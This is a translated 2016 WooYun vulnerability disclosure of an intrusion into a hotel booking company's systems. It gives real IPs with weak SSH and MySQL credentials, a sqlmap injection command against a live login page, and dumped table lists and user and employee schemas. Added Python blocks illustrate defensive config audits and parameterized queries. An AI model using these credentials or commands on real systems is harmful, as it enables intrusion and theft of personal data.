
Vulnerability summary

Defect ID: wooyun-2016-0188591

Title: A one-day tour of Dingfangbao's (订房宝) internal systems (multiple important systems / several hundred thousand user records / tens of thousands of merchant records / employee accounts, with passwords)

Vendor: dfb365.com

Author: 路淫甲

Submitted: 2016-03-24 21:30

Fixed: 2016-05-08 21:50

Published: 2016-05-08 21:50

Vulnerability type: successful intrusion

Severity: high

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-03-24: Details sent to the vendor, awaiting the vendor's handling
2016-03-24: Vendor has confirmed; details disclosed to the vendor only
2016-04-03: Details disclosed to core white hats and relevant domain experts
2016-04-13: Details disclosed to ordinary white hats
2016-04-23: Details disclosed to intern white hats
2016-05-08: Details disclosed to the public

Brief description:

Storming into Dingfangbao (订房宝) to capture Sola Aoi (苍井空) alive.
What follows is the dream-chasing journey in search of "Teacher Cang" (苍老师)...

Details:

Systems involved: renaming, mail, cs, and others.
A series of issues leads straight into the intranet and exposes all kinds of user data.
Affected IP:

[screenshot: 1.png]


First up is an SSH weak password with root privileges, giving direct access to the intranet:
ssh://114.215.150.232:8200
admin admin

[screenshots: 2.png, 3.1.png]


Port 3306 is reachable from the Internet, though the admin account has little data; root cannot connect from outside:
mysql://114.215.150.232:3306
admin admin

[screenshot: 3.png]


The internal local MySQL accepts root/root.
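The three footholds above (password-based SSH login as root, MySQL listening on an Internet-facing 3306, and root/root on the internal MySQL) are all configuration and credential hygiene failures that a deployment check can catch before an attacker does. As an added illustration, not code from this report or from dfb365, the following Python checker parses sshd_config and my.cnf fragments and flags the exposures, plus a small sanity check for username-as-password credentials. All configuration fragments, the password denylist and the option defaults assumed for missing keys are constructed sample values, not the vendor's actual settings.

```python
import re

# Constructed sample configuration fragments (assumed for this example, not the vendor's files).
WEAK_SSHD = """\
# sshd_config with password root login enabled
Port 8200
PermitRootLogin yes
PasswordAuthentication yes
"""

HARDENED_SSHD = """\
Port 8200
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
"""

WEAK_MYCNF = """\
[mysqld]
port = 3306
bind-address = 0.0.0.0
"""

HARDENED_MYCNF = """\
[mysqld]
port = 3306
bind-address = 127.0.0.1
"""


def parse_sshd_config(text):
    """Return {lowercased keyword: value} for 'Keyword value' lines; '#' comments are dropped."""
    opts = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) == 2:
            opts[parts[0].lower()] = parts[1].strip()
    return opts


def parse_mycnf(text, section="mysqld"):
    """Return the options of one [section] of an INI-style my.cnf.
    MySQL treats '-' and '_' in option names as equivalent, so keys are normalised to '_'.
    Flag-style options such as 'skip-networking' get an empty value."""
    opts = {}
    current = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = re.match(r"^\[(\w+)\]$", line)
        if m:
            current = m.group(1)
            continue
        if current != section:
            continue
        key, _, value = line.partition("=")
        opts[key.strip().replace("-", "_")] = value.strip()
    return opts


def audit_sshd(text):
    """Flag the two settings that turn a guessable password into a root shell.
    Defaults assumed for missing keys follow current OpenSSH (prohibit-password / yes)."""
    opts = parse_sshd_config(text)
    findings = []
    if opts.get("permitrootlogin", "prohibit-password").lower() == "yes":
        findings.append("PermitRootLogin yes: root may log in with a password")
    if opts.get("passwordauthentication", "yes").lower() == "yes":
        findings.append("PasswordAuthentication yes: passwords accepted; prefer keys")
    return findings


def audit_mysqld(text):
    """Flag a MySQL server that listens on every interface (what made 3306 reachable above).
    A missing bind-address is treated as 'all interfaces' (assumed default for this check)."""
    opts = parse_mycnf(text)
    if "skip_networking" in opts:
        return []  # TCP listener disabled entirely
    bind = opts.get("bind_address", "*")
    if bind in ("*", "0.0.0.0", "::"):
        return [f"bind-address {bind}: MySQL accepts TCP connections from any host"]
    return []


# Constructed denylist; a real deployment would check against a breach corpus instead.
TRIVIAL_PASSWORDS = {"admin", "root", "password", "123456", "123123"}


def is_trivial_credential(user, password):
    """True for username-as-password (admin/admin, root/root) or a default from the denylist."""
    pw = password.lower()
    return pw == user.lower() or pw in TRIVIAL_PASSWORDS


if __name__ == "__main__":
    for name, findings in (("sshd", audit_sshd(WEAK_SSHD)), ("mysqld", audit_mysqld(WEAK_MYCNF))):
        for finding in findings:
            print(f"[{name}] {finding}")
    print("root/root trivial:", is_trivial_credential("root", "root"))
```

Run against the hardened fragments, both audits return no findings; the point of keeping the parsers separate from the checks is that the same checks can be run against the real files pulled from a host inventory.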

[screenshots: 4.png, 5.png]


The technical department's mailboxes and passwords are thereby leaked:

[screenshot: 6.png]


Organization chart:

[screenshot: 7.png]


There is no "Teacher Cang" in the company org chart. So disappointing!!!

[screenshot: 8.png]


Project information:

[screenshots: 9.png, 10.png, 11.png, 12.png, 13.png, 14.png]

Proof of vulnerability:

SQL injection:
http://cs.dfb365.com/user/login.action
http://115.28.131.8:8082/user/login.action
sqlmap.py -u "http://115.28.131.8:8082/user/dologin.action" --data="model.email=admin*&model.password=123123" --threads=10 --tables -D "dfb356db2"
The login form itself is the injection point, and after logging in every search box is an injection point as well.
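The login injection above is the classic pattern of splicing the submitted email and password straight into the SQL text, which is why a single quote in the email field changes the query. As an added illustration, not code from this report or from dfb365's application, the following Python fragment shows a constructed vulnerable login beside its parameterized version against an in-memory SQLite table; the table, the sample row, the hash function and the crafted input are all assumed for the example.

```python
import hashlib
import sqlite3


def _digest(password):
    # Placeholder for the example only: a real system stores a salted, slow hash (bcrypt/argon2).
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """In-memory stand-in for an employee table with one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employee (account TEXT, email TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO employee VALUES (?, ?, ?)",
        ("admin", "admin@example.com", _digest("correct-horse")),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, email, password):
    """The pattern behind the finding: user input is spliced into the SQL string."""
    sql = (
        f"SELECT account FROM employee WHERE email = '{email}' "
        f"AND password = '{_digest(password)}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, email, password):
    """Same query, but the values are bound parameters and can never alter the SQL."""
    row = conn.execute(
        "SELECT account FROM employee WHERE email = ? AND password = ?",
        (email, _digest(password)),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    # Constructed input: closes the string literal and comments out the password comparison.
    crafted = "admin@example.com' --"
    print("vulnerable:", login_vulnerable(conn, crafted, "wrong"))  # admin
    print("safe:      ", login_safe(conn, crafted, "wrong"))        # None
```

With bound parameters the crafted email is compared literally against the column and matches nothing, so the password check is never bypassed; the same fix applies to the search boxes the author mentions, where the search term must likewise be bound rather than concatenated.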

[screenshot: a1.png]


Assorted user tables:
[15:25:08] [INFO] resumed: 134
[15:25:08] [INFO] resumed: action
[15:25:08] [INFO] resumed: activity
[15:25:08] [INFO] resumed: activity_business_record
[15:25:08] [INFO] resumed: activity_code
[15:25:08] [INFO] resumed: activity_hotel
[15:25:08] [INFO] resumed: activity_weixin
[15:25:08] [INFO] resumed: advertisement
[15:25:08] [INFO] resumed: advertisement_sort
[15:25:08] [INFO] resumed: app
[15:25:08] [INFO] resumed: b_log
[15:25:08] [INFO] resumed: basic_hotel_report
[15:25:08] [INFO] resumed: charge_refund_record
[15:25:08] [INFO] resumed: circle
[15:25:08] [INFO] resumed: city
[15:25:08] [INFO] resumed: district
[15:25:08] [INFO] resumed: employee
[15:25:08] [INFO] resumed: group
[15:25:08] [INFO] resumed: hotel
[15:25:08] [INFO] resumed: hotel_access_token
[15:25:08] [INFO] resumed: hotel_account
[15:25:08] [INFO] resumed: hotel_addition
[15:25:08] [INFO] resumed: hotel_auto_sell
[15:25:08] [INFO] resumed: hotel_bill
[15:25:08] [INFO] resumed: hotel_bomment
[15:25:08] [INFO] resumed: hotel_contact_person
[15:25:08] [INFO] resumed: hotel_dictionary
[15:25:08] [INFO] resumed: hotel_excellent
[15:25:08] [INFO] resumed: hotel_group
[15:25:08] [INFO] resumed: hotel_profile
[15:25:08] [INFO] resumed: hotel_recommended
[15:25:08] [INFO] resumed: hotel_service_fee
[15:25:08] [INFO] resumed: hotel_spread
[15:25:08] [INFO] resumed: hotel_spread_report
[15:25:08] [INFO] resumed: hotel_spread_withdraw
[15:25:08] [INFO] resumed: hotel_topic
[15:25:08] [INFO] resumed: interior
[15:25:08] [INFO] resumed: interior_bak
[15:25:08] [INFO] resumed: ip_access_count
[15:25:08] [INFO] resumed: ip_restrict
[15:25:08] [INFO] resumed: k_action
[15:25:08] [INFO] resumed: k_link_role_action
[15:25:08] [INFO] resumed: k_link_user_hotel
[15:25:08] [INFO] resumed: k_link_user_role
[15:25:08] [INFO] resumed: k_role
[15:25:08] [INFO] resumed: k_user
[15:25:08] [INFO] resumed: link_activity_hotel
[15:25:08] [INFO] resumed: link_activity_order
[15:25:08] [INFO] resumed: link_activity_passport
[15:25:08] [INFO] resumed: link_emp_role
[15:25:08] [INFO] resumed: link_hotel_city
[15:25:08] [INFO] resumed: link_hotel_group
[15:25:08] [INFO] resumed: link_hotel_photo
[15:25:08] [INFO] resumed: link_hotel_service
[15:25:08] [INFO] resumed: link_order_charge
[15:25:08] [INFO] resumed: link_order_coupon
[15:25:08] [INFO] resumed: link_response_room
[15:25:08] [INFO] resumed: link_response_room_bak
[15:25:08] [INFO] resumed: link_role_action
[15:25:08] [INFO] resumed: link_room_photo
[15:25:08] [INFO] resumed: link_room_price
[15:25:08] [INFO] resumed: link_room_state
[15:25:08] [INFO] resumed: link_sale_hotel
[15:25:08] [INFO] resumed: link_user_activitycode
[15:25:08] [INFO] resumed: link_wf_biztable
[15:25:08] [INFO] resumed: link_wf_refuse
[15:25:08] [INFO] resumed: location_airport
[15:25:08] [INFO] resumed: location_circle
[15:25:08] [INFO] resumed: location_city
[15:25:08] [INFO] resumed: location_district
[15:25:08] [INFO] resumed: location_line
[15:25:08] [INFO] resumed: location_station
[15:25:08] [INFO] resumed: location_subway
[15:25:08] [INFO] resumed: locomotor_activity
[15:25:08] [INFO] resumed: locomotor_activity_summary
[15:25:08] [INFO] resumed: locomotor_banner_summary
[15:25:08] [INFO] resumed: locomotor_type
[15:25:08] [INFO] resumed: mail_user
[15:25:08] [INFO] resumed: online_user
[15:25:08] [INFO] resumed: order_main
[15:25:08] [INFO] resumed: order_main_bak
[15:25:08] [INFO] resumed: order_main_temp
[15:25:08] [INFO] resumed: order_request
[15:25:08] [INFO] resumed: order_request_bak
[15:25:08] [INFO] resumed: order_response
[15:25:08] [INFO] resumed: order_response_bak
[15:25:08] [INFO] resumed: order_time
[15:25:08] [INFO] resumed: order_tohotels
[15:25:08] [INFO] resumed: order_user_infos_temp
[15:25:08] [INFO] resumed: pay_way_temp
[15:25:08] [INFO] resumed: photo
[15:25:08] [INFO] resumed: pingpp_charge
[15:25:08] [INFO] resumed: played_bills
[15:25:08] [INFO] resumed: policy
[15:25:08] [INFO] resumed: policy_action_hotel
[15:25:08] [INFO] resumed: policy_condition_hotel
[15:25:08] [INFO] resumed: red_envelop
[15:25:08] [INFO] resumed: red_envelope_link
[15:25:08] [INFO] resumed: role
[15:25:08] [INFO] resumed: room
[15:25:08] [INFO] resumed: room_auto_sell
[15:25:08] [INFO] resumed: room_prices
[15:25:08] [INFO] resumed: room_prices_temp
[15:25:08] [INFO] resumed: sms_verify_code
[15:25:08] [INFO] resumed: sys_dict
[15:25:08] [INFO] resumed: t_hotel_btoc
[15:25:08] [INFO] resumed: t_hotel_irect_log
[15:25:08] [INFO] resumed: t_promotion_detail
[15:25:08] [INFO] resumed: t_promotion_staff
[15:25:08] [INFO] resumed: test_weixin
[15:25:08] [INFO] resumed: threepart_token
[15:25:08] [INFO] resumed: threepart_user
[15:25:08] [INFO] resumed: tor_business_city
[15:25:08] [INFO] resumed: tor_hotel_direct
[15:25:08] [INFO] resumed: user
[15:25:08] [INFO] resumed: user_access_token
[15:25:08] [INFO] resumed: user_account
[15:25:08] [INFO] resumed: user_account_history
[15:25:08] [INFO] resumed: user_credit
[15:25:08] [INFO] resumed: user_passport
[15:25:08] [INFO] resumed: user_passport_list
[15:25:08] [INFO] resumed: user_pay
[15:25:08] [INFO] resumed: user_push_token
[15:25:08] [INFO] resumed: user_spread
[15:25:08] [INFO] resumed: user_statistics
[15:25:08] [INFO] resumed: weixin_user
[15:25:08] [INFO] resumed: wf_advice
[15:25:08] [INFO] resumed: wf_def
[15:25:08] [INFO] resumed: wf_node
[15:25:08] [INFO] resuming partial value: wf_node_pers
............
Database: dfb356db2
Table: employee
[12 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| account    | varchar(30)  |
| email      | varchar(60)  |
| has_update | char(1)      |
| hotel_id   | bigint(20)   |
| id         | bigint(20)   |
| is_del     | char(1)      |
| is_direct  | char(1)      |
| is_manager | int(1)       |
| mobile     | char(20)     |
| name       | varchar(100) |
| password   | char(40)     |
| status     | char(1)      |
+------------+--------------+

[screenshots: a2.png, a3.png]


Database: dfb356db2
Table: user
[13 columns]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| device_id     | varchar(50) |
| device_type   | varchar(20) |
| email         | varchar(50) |
| imei          | varchar(50) |
| login_time    | datetime    |
| open_id       | varchar(50) |
| password      | varchar(50) |
| phone_number  | varchar(50) |
| register_time | datetime    |
| score         | int(11)     |
| source_from   | varchar(20) |
| user_id       | bigint(20)  |
| user_name     | varchar(50) |
+---------------+-------------+

[screenshot: a4.png]


Still no "Teacher Cang" to be found!!

Fix recommendation:

Not playing anymore.

Copyright notice: when reposting, credit the source 路淫甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: high

Vulnerability Rank: 10

Confirmed: 2016-03-24 21:50

Vendor reply:

The vulnerability is being fixed. Many thanks to 路淫甲 and WooYun. My contact: zhesheng.

Latest status:

None yet